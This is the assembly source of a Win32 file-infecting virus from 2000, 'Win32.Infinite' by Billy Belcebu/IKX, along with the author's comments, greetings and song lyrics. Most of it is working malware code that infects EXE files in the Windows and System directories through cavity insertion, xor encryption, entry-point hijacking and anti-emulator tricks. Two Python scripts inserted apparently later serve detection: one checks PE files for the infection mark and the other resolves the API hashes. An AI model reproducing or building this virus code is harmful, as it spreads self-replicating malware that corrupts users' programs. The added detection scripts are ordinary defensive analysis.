;
;                  Win32.Infinite - Billy Belcebu / IKX
;                  [17/07/00 - Made in Valencia, Spain]
;
;[Introduction]
;
; Welcome to Infinite. This virus has been very ... for me, as its ambient
; of development was very odd. Well, it's my first virus using cavity tech,
; something that I thought was more difficult than it really was...
; I sincerely doubt that it would work in the WinNT family (NT4, W2K), as I
; haven't been able to test it there (Win2k has some incompatibilities with
; my 3dfx Voodoo2 and my sound card, but I didn't want to change that thing
; of Win32). If it doesn't, I don't care... Blah blah blah, I've returned
; from my laaaarge VX holidays and I've just recently finished Forever and
; this babe. I hope I haven't lost my awesome code style (blah, just
; kidding... I don't have anything awesome besides the size of my dick -
; enormous :)
; Oh, I almost forgot... I've realized that the cavity technique is stable
; most of the times, but it's not perfect, and I should do many more
; comprobations before infection than the already existing ones. And don't
; care: Windows also has fails in its code and no one minds it ;)
; It's not a special virus in any field, but I wanted to do some cavity
; stuff and here it is. Mwaha!
;
;[Features]
;
; Cavity virus, searches for holes of zeroes or int 3.
; Infects files on current, Windows and Windows\System directories.
; Simple & silly 8-byte xor encryption loop.
; Kinda simple EPO with emulator protection.
; Checks for SFC protection (if it works in Win2k...).
; CRC32 usage (APIs, extensions...).
; It's intended to be optimized (not too much, but enough).
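The marker and section changes this virus makes can be checked from the defender's side. The script below is an added example, not part of the original source: it parses a PE32 header, reads the field at PE+4Ch (the optional header's Win32VersionValue, normally zero) where the infection mark "aiag" is written, and flags an entry-point section that was left both writable and executable (the 0A0000020h characteristics or'ed in by the infection engine). The sample header it builds is constructed for the demonstration and is not a runnable program.

```python
import struct

# Values from the virus source: INF_MARK = "aiag" goes to PE+4Ch (MagicInfection),
# and the section holding the virus body gets IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_WRITE.
INF_MARK = b"aiag"
MARK_OFFSET = 0x4C
SCN_WRITE_EXEC = 0xA0000000


def triage_pe(data: bytes) -> dict:
    """Parse the headers of a PE32 image and report Infinite-style indicators."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsect = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 0x14)[0]
    entry = struct.unpack_from("<I", data, pe + 0x28)[0]   # AddressOfEntryPoint
    marker = data[pe + MARK_OFFSET:pe + MARK_OFFSET + 4]   # Win32VersionValue

    # Walk the section table (starts right after the optional header) and find
    # the section containing the entry point, exactly as the infector does.
    ep_name, ep_chars = None, 0
    for i in range(nsect):
        off = pe + 0x18 + opt_size + i * 0x28
        vsize, va = struct.unpack_from("<II", data, off + 8)
        if va <= entry < va + vsize:
            ep_name = data[off:off + 8].rstrip(b"\0").decode("ascii")
            ep_chars = struct.unpack_from("<I", data, off + 0x24)[0]
            break

    return {
        "marked": marker == INF_MARK,
        "win32_version_value_nonzero": marker != b"\0\0\0\0",
        "ep_section": ep_name,
        "ep_section_writable_exec": (ep_chars & SCN_WRITE_EXEC) == SCN_WRITE_EXEC,
    }


def build_sample(marker: bytes = b"\0\0\0\0", chars: int = 0x60000020) -> bytes:
    """Constructed minimal PE32 header with one .text section at RVA 0x1000."""
    mz = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x010F)  # i386, 1 section
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    struct.pack_into("<I", opt, 0x10, 0x1000)                         # AddressOfEntryPoint
    opt[0x34:0x38] = marker                                           # Win32VersionValue
    sect = b".text\0\0\0" + struct.pack(
        "<IIIIIIHHI", 0x1000, 0x1000, 0x1000, 0x400, 0, 0, 0, 0, chars)
    return mz + b"PE\0\0" + file_hdr + bytes(opt) + sect


if __name__ == "__main__":
    print("clean   :", triage_pe(build_sample()))
    print("infected:", triage_pe(build_sample(INF_MARK, 0x60000020 | 0xA0000020)))
```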
;
;[Greetings]
;
; This time the greets will go to few ppl. From the VX scene, to Starzer0,
; Wintermute, Virusbuster, Benny, Asmodeus, Lifewire, Bumblebee, Ypsilon,
; and from outside to my best friends out there. Also to the people that try
; to make this place we call World a much better place. You rule, guyz.
;
;[Infinity - The Song]
;
; Mother watch your children
; The iron fist of fear is ruling our lives
; It's not too late to change the course
; We can make this world a better place to be in
;
; How much more do we want until we're satisfied?
; What happens when we get what we want?
; Acquiring more, still there's never enough
; We forget those who really are in need
; The end is near, or so they say
; Selling peace with guns
;
; Infinity - Where do we go from here?
; Infinity - Where do we go from here?
; Infinity - Where do we go?
; Infinity - Where do we go from here?
;
; Guns spitting (out the) message of peace everywhere
; Is it really that we don't care?
; See mercenaries of fear selling love
; Telling salvation comes from above
; Arrogance and fear walking hand in hand
; We must see that there's much more to life than this
;
; Mother see your children
; Make us understand and help us to find the way
; The answers lie inside
; They are locked inside the vault of truth of us
; It's time to spread the word around
; Be yourself and do what you want to do with your life
; Remember, you get just what you give
; You reap all what you sow
; You are in charge of your own destiny
;
; Infinity - Where do we go from here?
; Infinity - Where do we go from here?
; Infinity - Where do we go?
; Infinity - Where do we go from here?
;
; You make your own way
;
; ------------------------------------------
Infinity - [Stratovarius] - (Infinite)
;
; (c) 2000 Billy BelceBu / IKX [http://beautifulpeople.cjb.net]
;----------------------------------------------------------------------------
; Win32.Infinite (c) 2000 Billy Belcebu / IKX
;----------------------------------------------------------------------------

        include host.inc                ; some nice includes
        include infinite.inc

virseg  segment dword use32 public 'infinite'

virus_start:

;----------------------------------------------------------------------------
; Virus code
;----------------------------------------------------------------------------

infinite:
        push    eax                     ; make some space on stack
        pushad
        call    decrypt

encrypt_start = $

        call    get_delta
        call    setseh                  ; set new protection frame
        mov     esp,[esp+08h]
        call    get_delta
        jmp     restoreseh

setseh:
        xor     edx,edx
        push    dword ptr fs:[edx]
        mov     dword ptr fs:[edx],esp

        push    05h                     ; ecx is the limit of pages
        pop     ecx
        mov     esi,ebp                 ; we put a page inside our code
        call    checkimagebase          ; get our own image base
        mov     dword ptr [ebp+modbase-delta],esi

        push    05h                     ; 50 pages to scan
        pop     ecx
        mov     esi,[esp+2ch]           ; put the candidate to kernel
        call    checkimagebase          ; scan backwards for it
        mov     dword ptr [ebp+kernel-delta],esi

        lea     eax,[ebp+api_list-delta] ; let's detect all the needed
        xchg    eax,esi                 ; APIs :)
        lea     edi,[ebp+api_addresses-delta]
        call    getapis

; Virus is now initialized, let's search for objectives.

        lea     edi,[ebp+current_dir-delta] ; save current directory to
        push    edi                     ; a temp variable
        push    7fh
        apicall GetCurrentDirectoryA

        lea     edi,[ebp+infect_dir-delta]
        push    7fh
        push    edi
        apicall GetWindowsDirectoryA
        call    setdir&infect

        lea     edi,[ebp+infect_dir-delta]
        push    7fh
        push    edi
        apicall GetSystemDirectoryA
        call    setdir&infect

        lea     edi,[ebp+current_dir-delta]
        push    edi
        apicall SetCurrentDirectoryA
        call    seek&infect

; Now let's unprotect the memory where the EPO bytes will be restored

        call    hh&l                    ; hunting high & low :)
        dq      ?
hh&l:   push    04h                     ; PAGE_READWRITE
        push    epo_bytes
        mov     eax,dword ptr [ebp+rethost-delta]
        add     eax,dword ptr [ebp+modbase-delta]
        push    eax
        apicall VirtualProtect

; Now it's time to go away ;)

restoreseh:
        xor     edx,edx                 ; restore original SEH
        pop     dword ptr fs:[edx]
        pop     edx

        mov     edi,(offset host-400000h)
rethost equ     $-4
        add     edi,12345678h
modbase equ     $-4
        mov     [esp+20h],edi
        call    over0
sebes   db      epo_bytes dup (90h)
over0:  pop     esi
        push    epo_bytes
        pop     ecx
        rep     movsb
        popad
        ret
;----------------------------------------------------------------------------
; Mark of the virus
;----------------------------------------------------------------------------

        db      0,"Win32.Infinite (c) 2000 Billy Belcebu/IKX",0
;----------------------------------------------------------------------------
; Search for files to infect
;----------------------------------------------------------------------------

setdir&infect:
        lea     edi,dword ptr [ebp+infect_dir-delta]
        push    edi
        apicall SetCurrentDirectoryA

seek&infect:
        lea     eax,[ebp+wfd-delta]     ; search for files
        push    eax
        call    over3
        db      "*.*",0                 ; search for all files
over3:  apicall FindFirstFileA
        mov     dword ptr [ebp+searchhandle-delta],eax
        inc     eax
        jz      failoccured

searchformore:
        push    dword ptr [ebp+modbase-delta] ; preserve untouchable info
        push    dword ptr [ebp+rethost-delta]

        lea     edi,[(ebp+wfd.szFileName)-delta] ; is the file found factible
        push    edi                     ; of being infected?
        call    processextension
        pop     edi
        jecxz   notthistime             ; nopes.

        call    infectpe

notthistime:
        pop     dword ptr [ebp+rethost-delta] ; restore this interesting
        pop     dword ptr [ebp+modbase-delta] ; info

        lea     edi,[(ebp+wfd.szFileName)-delta] ; fill this with zeroes
        mov     ecx,260
        xor     al,al
        rep     stosb

        lea     eax,[ebp+wfd-delta]     ; search for more little
        push    eax                     ; suckers
        push    dword ptr [ebp+searchhandle-delta]
        apicall FindNextFileA
        or      eax,eax
        jnz     searchformore

closesearchhandle:
        push    dword ptr [ebp+searchhandle-delta]
        apicall FindClose

failoccured:
        ret

processextension:
; Input:
;   EDI - pointer to file name
; Output:
;   ECX - null if it isn't an extension, 1 if it is.
        xor     al,al                   ; search for null
        scasb
        jnz     $-1
        lea     esi,[edi-5]             ; get the extension :)
        push    05h                     ; size to calculate CRC32
        pop     edi
        or      dword ptr [esi],20202020h ; make lowercase the letters
        call    crc32
        cmp     eax,0F643C743h          ; only EXE files
        jz      itwasextension
        dec     edx
itwasextension:
        inc     edx
        mov     ecx,edx
        ret
;----------------------------------------------------------------------------
; PE infection engine
;----------------------------------------------------------------------------

infectpe:
; Input:
;   EDI - pointer to filename to infect
; Output:
;   Nothing.
        cmp     dword ptr [ebp+SfcIsFileProtected-delta],00h
        jz      notinwin2k

        push    edi                     ; Win2k ability: it has a feature
        push    00h                     ; that warns the user if an
        apicall SfcIsFileProtected      ; important file is being
                                        ; modified. If the file has
        or      eax,eax                 ; such protection, we won't
        jnz     exitinfectpe            ; touch it, ok? ;)

notinwin2k:
        push    80h                     ; destroy hostile attributes
        push    edi                     ; and put normal ones
        apicall SetFileAttributesA

        xor     eax,eax                 ; open file for r/w
        push    eax
        push    eax
        push    03h                     ; OPEN_EXISTING flag
        push    eax
        inc     eax
        push    eax
        push    0C0000000h              ; read/write
        push    edi
        apicall CreateFileA
        inc     eax
        jz      exitinfectpe
        dec     eax
        mov     dword ptr [ebp+filehandle-delta],eax

; Save handle of opened file

        push    eax
        push    00h
        push    eax
        apicall GetFileSize             ; get its size
        mov     dword ptr [ebp+originalsize-delta],eax
        pop     ecx                     ; ecx = handle

        xor     ebx,ebx                 ; ebx = 0
        push    ebx
        push    00h                     ; push size
        push    ebx
        push    04h
        push    ebx
        push    ecx                     ; push handle
        apicall CreateFileMappingA
        or      eax,eax
        jz      closefileexitinfectpe
        mov     dword ptr [ebp+maphandle-delta],eax

        xor     ebx,ebx
        push    00h                     ; we want to map only file size
        push    ebx
        push    ebx
        push    02h
        push    eax
        apicall MapViewOfFile
        or      eax,eax
        jz      unmap&closemap&fileexitinfectpe
        mov     dword ptr [ebp+mapaddress-delta],eax

        mov     esi,[eax+3ch]           ; ptr to PE header =]
        add     esi,eax
        mov     dword ptr [ebp+ptrpeh-delta],esi
        cmp     word ptr [esi],"EP"     ; check for PE mark
        jnz     trunc&unmap&closemap&fileexitinfectpe
        cmp     dword ptr [esi.MagicInfection],inf_mark
        jz      trunc&unmap&closemap&fileexitinfectpe ; check for previous infection
        cmp     word ptr [esi.Machine],014Ch
        jnz     trunc&unmap&closemap&fileexitinfectpe ; check for i386 ;)
        cmp     dword ptr [ebp+wfd.nFileSizeHigh-delta],00h
        jne     trunc&unmap&closemap&fileexitinfectpe ; don't allow huge & ugly files
        cmp     dword ptr [ebp+wfd.nFileSizeLow-delta],4000h
        jb      trunc&unmap&closemap&fileexitinfectpe ; don't allow too little files

        mov     eax,[esi.EntryPointRVA] ; eax = old file's EIP
        mov     dword ptr [ebp+rethost-delta],eax
        mov     edi,esi
        add     esi,0F8h-28h            ; pointer to 1st section-28h
nextsection:
        add     esi,28h                 ; ptr to section name ;)
        mov     edx,eax                 ; put in edx the original EIP
        sub     edx,[esi.VirtualAddress] ; remove the VirtualAddress
        cmp     edx,[esi.VirtualSize]   ; is EIP pointing to this sec?
        jae     nextsection             ; if not, loop again

        mov     ebx,dword ptr [ebp+mapaddress-delta]
        pushad
        push    dword ptr [esi.SizeOfRawData] ; some tricky thing :)
        pop     dword ptr [esi.VirtualSize]
        mov     eax,[ebp+rethost-delta]
        add     eax,ebx
        mov     dword ptr [ebp+tempshit-delta],eax
        popad
        add     ebx,[esi.PtrToRawData]
        add     edx,ebx
        mov     esi,edx                 ; esi - pointer to section
        mov     dword ptr [ebp+epofs-delta],esi ; mapped in mem where da EP is.

        mov     ebx,dword ptr [ebp+originalsize-delta] ; search limit
        mov     ecx,heap_end-virus_start+security ; how many space do we need
        call    seekforholes
        jc      therewasnohole

        pushad
        sub     eax,dword ptr [ebp+mapaddress-delta]
        mov     esi,dword ptr [ebp+ptrpeh-delta]
        mov     edi,esi                 ; we wanna put some attribs
        add     esi,0F8h-28h            ; to the section where the
nextsection2:
        add     esi,28h                 ; virus code is located, so
        mov     edx,eax                 ; we've to search for it :)
        sub     edx,[esi.VirtualAddress]
        cmp     edx,[esi.VirtualSize]
        jae     nextsection2

; eax = ptr to hole

        mov     dword ptr [ebp+inf_switch-delta],00h

; Let's check if we can put ourselves inside the hole (more security)

        mov     edx,[esi.VirtualAddress]
        add     edx,[esi.VirtualSize]
        add     eax,(heap_end-virus_start+security)
        sub     edx,eax
        js      wecantinfectthere
        mov     dword ptr [ebp+inf_switch-delta],01h
        or      [esi.Characteristics],0A0000020h ; put it sucka!
wecantinfectthere:
        popad

        mov     ecx,12345678h
        org     $-4
inf_switch dd   ?
        or      ecx,ecx
        jz      trunc&unmap&closemap&fileexitinfectpe

        lea     esi,[ebp+virus_start-delta]
        mov     edi,eax
        add     edi,security            ; some security :)
        pushad
        mov     eax,12345678h           ; let's calculate where the
tempshit = $-4                          ; jmp must point to
        add     eax,(killemu-epo)
        sub     edi,eax
        mov     dword ptr [ebp+jmpadd-delta],edi
        popad
        mov     ecx,virus_size
        rep     movsb

; Encrypt with a silly l00p

        pushad
        sub     edi,virus_end-encrypt_start
        mov     esi,edi
        call    random
        mov     bl,al
        mov     byte ptr [edi+enc_key-encrypt_start],bl
        mov     byte ptr [ebp+enc_k3y-delta],bl
        mov     ecx,encrypt_end-encrypt_start
enc_l00p:
        lodsb
        xor     al,bl
        stosb
        loop    enc_l00p
        popad

        pushad
        sub     edi,(virus_size-(sebes-virus_start))
        mov     esi,dword ptr [ebp+epofs-delta]
        push    epo_bytes
        pop     ecx
        pushad
lewpit:
        lodsb                           ; store EPO bytes also
        xor     al,00h                  ; encrypted
enc_k3y = $-1
        stosb
        loop    lewpit
        popad
        xchg    edi,esi
        call    over69

;----------------------------------------------------------------------------
epo:    call    killemu                 ; this code will give the control to
        mov     esp,[esp+08h]           ; the virus and avoid the scanning
        xor     edx,edx                 ; of emulators at the same time :)
        pop     dword ptr fs:[edx]
        pop     edx
        db      0E9h
jmpadd: dd      ?
killemu: xor    edx,edx
        push    dword ptr fs:[edx]
        mov     fs:[edx],esp
        div     edx
epo_bytes = $-epo
;----------------------------------------------------------------------------

over69: pop     esi
        rep     movsb
        popad

        mov     esi,dword ptr [ebp+ptrpeh-delta]
        mov     dword ptr [esi.MagicInfection],inf_mark ; put inf. mark

; Fix checksum if needed

        add     esi,58h
        cmp     dword ptr [esi],00h
        jz      trunc&unmap&closemap&fileexitinfectpe
        push    esi                     ; pointer to checksum field
        call    n4t4s
        dd      ?                       ; where to store old checksum
n4t4s:  push    dword ptr [ebp+originalsize-delta]
        push    dword ptr [ebp+mapaddress-delta]
        apicall CheckSumMappedFile

therewasnohole:
trunc&unmap&closemap&fileexitinfectpe:
unmap&closemap&fileexitinfectpe:
        push    dword ptr [ebp+mapaddress-delta]
        apicall UnmapViewOfFile
closemap&fileexitinfectpe:
        push    dword ptr [ebp+maphandle-delta]
        apicall CloseHandle
closefileexitinfectpe:
        push    dword ptr [ebp+filehandle-delta]
        apicall CloseHandle
exitinfectpe:
        ret
seekforholes:
; Input:
;   ESI - pointer inside file (in PE header)
;   ECX - how many space do we need
;   EBX - search limit
; Output:
;   EAX - pointer to the beginning of the hole
;   CF  - set if error (couldn't find hole)
        call    setseh1
        mov     esp,[esp+08h]           ; just for security of
        call    get_delta               ; scanning :)
        jmp     nse_
setseh1:
        xor     edx,edx
        push    dword ptr fs:[edx]
        mov     dword ptr fs:[edx],esp

        push    esi
getanotherbyte:
        xor     edx,edx                 ; clear counter :)
gab2:   dec     ebx                     ; check if we arrived until
        jz      noshitenough            ; the limit (run away if so)
        lodsb
        or      al,al                   ; null byte?
        jz      isfillbyte
        cmp     al,0CCh                 ; int 3? (VC6 filez're full
        jnz     getanotherbyte          ; of them)
isfillbyte:
        inc     edx                     ; increase counter
        cmp     ecx,edx
        jnz     gab2

wefoundmanyshit:
        sub     esi,ecx                 ; esi = point to hole
        xchg    eax,esi
        pop     esi
        pop     dword ptr fs:[00h]
        pop     edx
        ret

noshitenough:
        pop     esi
nse_:   stc
        pop     dword ptr fs:[00h]
        pop     edx
        ret
;----------------------------------------------------------------------------
; API CRC32 search engine
;----------------------------------------------------------------------------

getapis proc
; Input:
;   EAX - base address of the library where to search the APIs
;   ESI - pointer to an array of CRC32 of the APIs we want to search
;   EDI - pointer to where to store the APIs
; Output:
;   Nothing.
        push    eax                     ; eax = handle of module
        pop     dword ptr [ebp+tmpmodulebase-delta]
apis33k:
        lodsd                           ; get in eax the CRC32 of API
        push    esi edi
        call    getapi_et_crc32
        pop     edi esi
        stosd                           ; save in [edi] the API address
        cmp     byte ptr [esi],0BBh     ; there are more APIs in this
        jnz     apis33k                 ; library?
        inc     esi                     ; check if it's the last of
        cmp     byte ptr [esi],""       ; all them
        jz      endofapisearch
        push    esi                     ; esi points now to the ASCIIZ
        apicall LoadLibraryA            ; string of a library... we
                                        ; need to load it!
        push    eax
nxtchr: lodsb                           ; reach the end of the lib
        test    al,al                   ; ASCIIZ name
        jnz     nxtchr
        pop     eax
        jmp     getapis
endofapisearch:
        ret
getapis endp

getapi_et_crc32 proc
; Input:
;   EAX - CRC32 of the API we want to know its address
; Output:
;   EAX - API address, null if error
        xor     edx,edx
        pushad
        call    over_apicrc32_seh
        mov     esp,[esp+08h]           ; set stack as before
        xor     eax,eax                 ; signalize the error
        jmp     remove_apicrc32_seh
over_apicrc32_seh:
        push    dword ptr fs:[edx]      ; set new SEH frame
        mov     dword ptr fs:[edx],esp

        xchg    eax,edx                 ; put CRC32 of da API in edx
        mov     dword ptr [ebp+counter-delta],eax ; clear this field :)
        push    3ch
        pop     esi
        add     esi,[ebp+tmpmodulebase-delta] ; get PE header of module
        lodsw
        add     eax,[ebp+tmpmodulebase-delta] ; normalize
        push    1ch
        pop     esi
        add     esi,[eax+78h]           ; get a pointer to its .edata
        add     esi,[ebp+tmpmodulebase-delta]
        lea     edi,[ebp+addresstableva-delta] ; pointer to the address table
        lodsd                           ; get AddressTable value
        add     eax,[ebp+tmpmodulebase-delta] ; normalize
        stosd                           ; and store in its variable
        lodsd                           ; get NameTable value
        add     eax,[ebp+tmpmodulebase-delta] ; normalize
        push    eax                     ; put it in stack
        stosd                           ; store in its variable
        lodsd                           ; get OrdinalTable value
        add     eax,[ebp+tmpmodulebase-delta] ; normalize
        stosd                           ; store
        pop     esi                     ; esi = NameTable VA
@@_3:   lodsd                           ; get pointer to an API name
        push    esi                     ; save again
        add     eax,[ebp+tmpmodulebase-delta] ; normalize
        xchg    edi,eax                 ; store ptr in edi
        mov     ebx,edi                 ; and in ebx
        push    edi                     ; save edi
        xor     al,al
        scasb
        jnz     $-1
        pop     esi                     ; esi = pointer to API name
        sub     edi,ebx                 ; edi = API name size
        push    edx                     ; save API's CRC32
        call    crc32                   ; get actual API's CRC32
        pop     edx                     ; restore API's CRC32
        cmp     edx,eax                 ; are they equal?
        jz      @@_4                    ; if yes, we got it
        pop     esi                     ; restore ptr to API name
        inc     dword ptr [ebp+counter-delta] ; and increase the counter
        jmp     @@_3                    ; get another API!
@@_4:
        pop     esi                     ; remove shit from stack
        mov     eax,12345678h           ; put in eax the number that
counter = $-4                           ; the API occupies in the list.
        shl     eax,1                   ; *2 (it's an array of words)
        add     eax,[ebp+ordinaltableva-delta] ; normalize
        xchg    eax,esi                 ; esi = ptr 2 ordinal; eax = 0
        lodsw                           ; get ordinal in ax
        cwde                            ; clear MSW of eax
        shl     eax,2                   ; and with it we go to the
        add     eax,[ebp+addresstableva-delta] ; AddressTable (array of
        xchg    esi,eax                 ; dwords)
        lodsd                           ; get address of API RVA
        add     eax,[ebp+tmpmodulebase-delta] ; and normalize!! That's it!
remove_apicrc32_seh:
        xor     edx,edx                 ; remove that SEH frame
        pop     dword ptr fs:[edx]
        pop     edx
        mov     [esp+1ch],eax
        popad
        ret
getapi_et_crc32 endp
;----------------------------------------------------------------------------
; Subroutines
;----------------------------------------------------------------------------

crc32:
; Input:
;   ESI - pointer to the data to process
;   EDI - size of such data
; Output:
;   EAX - CRC32 of that data
        cld
        pushad
        xor     ecx,ecx                 ; optimized by me - 2 bytes
        dec     ecx                     ; less
        mov     edx,ecx
nextbytecrc:
        xor     eax,eax
        xor     ebx,ebx
        lodsb
        xor     al,cl
        mov     cl,ch
        mov     ch,dl
        mov     dl,dh
        mov     dh,8
nextbitcrc:
        shr     bx,1
        rcr     ax,1
        jnc     nocrc
        xor     ax,08320h
        xor     bx,0EDB8h
nocrc:  dec     dh
        jnz     nextbitcrc
        xor     ecx,eax
        xor     edx,ebx
        dec     edi
        jnz     nextbytecrc
        not     edx
        not     ecx
        xchg    eax,edx
        rol     eax,10h
        mov     ax,cx
        mov     [esp+pushad_eax],eax
        popad
        ret

checkimagebase:
; Input:
;   ESI - address inside module
;   ECX - limit
; Output:
;   ESI - module address
        and     esi,0FFFF0000h
        cmp     word ptr [esi],"ZM"
        jz      itwaskewlenough
notcooladdress:
        sub     esi,00010000h
        loop    checkimagebase
itwaskewlenough:
        ret

random:
; Input:
;   Nothing.
; Output:
;   EAX - random number
        apicall GetTickCount
        xor     eax,12345678h
        org     $-4
seed    dd      -1
        mov     dword ptr [ebp+seed-delta],eax
        ret

; Let's save some bytes ;)

get_delta:
        call    delta                   ; get a relative address from
delta:  pop     ebp                     ; where to calculate offsets
        ret
;----------------------------------------------------------------------------
; Virus data
;----------------------------------------------------------------------------

api_list = $
;       db      "kernel32",0            ; don't need
@VirtualProtect         dd      079C3D4BBh
@FindFirstFileA         dd      0AE17EBEFh
@FindNextFileA          dd      0AA700106h
@FindClose              dd      0C200BE21h
@CreateFileA            dd      08C892DDFh
@SetFileAttributesA     dd      03C19E536h
@CloseHandle            dd      068624A9Dh
@GetCurrentDirectoryA   dd      0EBC6C18Bh
@SetCurrentDirectoryA   dd      0B2DBD7DCh
@GetWindowsDirectoryA   dd      0FE248274h
@GetSystemDirectoryA    dd      0593AE7CEh
@CreateFileMappingA     dd      096B2D96Ch
@MapViewOfFile          dd      0797B49ECh
@UnmapViewOfFile        dd      094524B42h
@SetEndOfFile           dd      059994ED6h
@GetFileSize            dd      0EF7D811Bh
@SetFilePointer         dd      085859D42h
@GetSystemTime          dd      075B7EBE8h
@LoadLibraryA           dd      04134D1ADh
@FreeLibrary            dd      0AFDF191Fh
@GlobalAlloc            dd      083A353C3h
@GlobalFree             dd      05CDF6B6Ah
@WriteFile              dd      021777793h
@GetProcAddress         dd      0FFC97C1Fh
@GetTickCount           dd      0613FD7BAh
        db      0BBh
        db      "imagehlp",0
@CheckSumMappedFile     dd      078B31744h
        db      0BBh
        db      "sfc",0
@SfcIsFileProtected     dd      06DE8F7ABh
        db      0BBh
; That's the end, my friends...
        db      ""

encrypt_end = $
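An analyst looking at a sample like this sees only the hash table above, so the first triage step is to turn the hashes back into export names. The Python below is an added example, not part of the original source: it takes the CRC32 values from the API_LIST table, hashes a constructed list of candidate export names with the standard CRC-32 that the CRC32 routine implements (polynomial EDB88320h, initial and final inversion), and reports which name each hash belongs to. Because the routine measures the name length up to and including the terminating NUL, the resolver tries both conventions and picks the one that explains more of the table; `CANDIDATES` and the function names are mine.

```python
import zlib

# Hashes copied from the virus's API_LIST table, grouped by library.
INFINITE_HASHES = {
    "kernel32": [0x79C3D4BB, 0xAE17EBEF, 0xAA700106, 0xC200BE21, 0x8C892DDF,
                 0x3C19E536, 0x68624A9D, 0xEBC6C18B, 0xB2DBD7DC, 0xFE248274,
                 0x593AE7CE, 0x96B2D96C, 0x797B49EC, 0x94524B42, 0x59994ED6,
                 0xEF7D811B, 0x85859D42, 0x75B7EBE8, 0x4134D1AD, 0xAFDF191F,
                 0x83A353C3, 0x5CDF6B6A, 0x21777793, 0xFFC97C1F, 0x613FD7BA],
    "imagehlp": [0x78B31744],
    "sfc": [0x6DE8F7AB],
}

# Constructed candidate list (in practice: the DLL's full export table).
CANDIDATES = [
    "VirtualProtect", "FindFirstFileA", "FindNextFileA", "FindClose", "CreateFileA",
    "SetFileAttributesA", "CloseHandle", "GetCurrentDirectoryA", "SetCurrentDirectoryA",
    "GetWindowsDirectoryA", "GetSystemDirectoryA", "CreateFileMappingA", "MapViewOfFile",
    "UnmapViewOfFile", "SetEndOfFile", "GetFileSize", "SetFilePointer", "GetSystemTime",
    "LoadLibraryA", "FreeLibrary", "GlobalAlloc", "GlobalFree", "WriteFile",
    "GetProcAddress", "GetTickCount", "CheckSumMappedFile", "SfcIsFileProtected",
    "ExitProcess", "VirtualAlloc",
]


def crc32_name(name: str, with_nul: bool) -> int:
    """Standard CRC-32 of an export name. The virus's GetAPI_ET_CRC32 computes the
    size as (pointer past the NUL - name start), i.e. NUL included; with_nul=False
    is offered for hash tables built without the terminator."""
    data = name.encode("ascii") + (b"\0" if with_nul else b"")
    return zlib.crc32(data) & 0xFFFFFFFF


def resolve_hashes(hashes, candidates, with_nul=True):
    """Map each hash to a candidate export name, or None when nothing matches."""
    lookup = {crc32_name(n, with_nul): n for n in candidates}
    return {h: lookup.get(h) for h in hashes}


def detect_convention(hashes, candidates) -> bool:
    """Return the NUL convention (True = NUL included) that resolves more hashes."""
    hits = {c: sum(v is not None for v in resolve_hashes(hashes, candidates, c).values())
            for c in (True, False)}
    return max(hits, key=hits.get)


if __name__ == "__main__":
    every_hash = [h for lst in INFINITE_HASHES.values() for h in lst]
    conv = detect_convention(every_hash, CANDIDATES)
    print("NUL included in hashed name:", conv)
    for lib, lst in INFINITE_HASHES.items():
        for h, name in resolve_hashes(lst, CANDIDATES, conv).items():
            print(f"{lib:9s} {h:08X} -> {name or '<unresolved>'}")
```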
;----------------------------------------------------------------------------
; Simple decryption l00p :)
;----------------------------------------------------------------------------

decrypt:
        pop     esi
        mov     edi,esi
        mov     ecx,encrypt_end-encrypt_start
        mov     bl,00h
enc_key = $-1
dec_l00p:
        lodsb
        xor     al,bl
        stosb
        loop    dec_l00p
        jmp     encrypt_start

virus_end = $
;----------------------------------------------------------------------------
; Virus data in the heap
;----------------------------------------------------------------------------

kernel                  dd      ?
tmpmodulebase           dd      ?
addresstableva          dd      ?
nametableva             dd      ?
ordinaltableva          dd      ?
originalsize            dd      ?
searchhandle            dd      ?
filehandle              dd      ?
maphandle               dd      ?
mapaddress              dd      ?
ptrpeh                  dd      ?
epofs                   dd      ?

api_addresses = $
; Kernel32 APIs
VirtualProtect          dd      ?
FindFirstFileA          dd      ?
FindNextFileA           dd      ?
FindClose               dd      ?
CreateFileA             dd      ?
SetFileAttributesA      dd      ?
CloseHandle             dd      ?
GetCurrentDirectoryA    dd      ?
SetCurrentDirectoryA    dd      ?
GetWindowsDirectoryA    dd      ?
GetSystemDirectoryA     dd      ?
CreateFileMappingA      dd      ?
MapViewOfFile           dd      ?
UnmapViewOfFile         dd      ?
SetEndOfFile            dd      ?
GetFileSize             dd      ?
SetFilePointer          dd      ?
GetSystemTime           dd      ?
LoadLibraryA            dd      ?
FreeLibrary             dd      ?
GlobalAlloc             dd      ?
GlobalFree              dd      ?
WriteFile               dd      ?
GetProcAddress          dd      ?
GetTickCount            dd      ?
; ImageHlp APIs
CheckSumMappedFile      dd      ?
; SFC APIs
SfcIsFileProtected      dd      ?

; Other data
wfd                     WIN32_FIND_DATA <>
infect_dir              db      7Fh dup (?)
current_dir             db      7Fh dup (?)

heap_end = $

virseg  ends
        end     infinite
;------------------------------- [Infinite.inc] -----------------------------;
;****************************************************************************
;** This is the include file for the constants and macros of the virus     **
;****************************************************************************

; Constants

virus_size      = virus_end-virus_start
total_size      = heap_end-virus_start
inf_mark        = "aiag"
security        = 20d                   ; very important

pushad_edi      = 00h
pushad_esi      = 04h
pushad_ebp      = 08h
pushad_esp      = 0Ch
pushad_ebx      = 10h
pushad_edx      = 14h
pushad_ecx      = 18h
pushad_eax      = 1Ch

; Some PE header stuff

MagicPE         = 00h
Machine         = 04h
NumberOfSections = 06h
EntryPointRVA   = 28h
CodeRVA         = 2Ch
FileAlignment   = 3Ch
MagicInfection  = 4Ch
SizeOfImage     = 50h
CheckSum        = 58h
PECharacteristics = 5Eh
DirEntryReloc   = 0A0h

; Some section header fields

SectionName     = 00h
VirtualSize     = 08h
VirtualAddress  = 0Ch
SizeOfRawData   = 10h
PtrToRawData    = 14h
PtrToReloc      = 18h
NumOfReloc      = 20h
Characteristics = 24h

; Macros

apicall macro   api2call
        call    dword ptr [ebp+api2call-delta]
        endm

; Structures

WIN32_FIND_DATA struct
dwFileAttributes        dd      ?
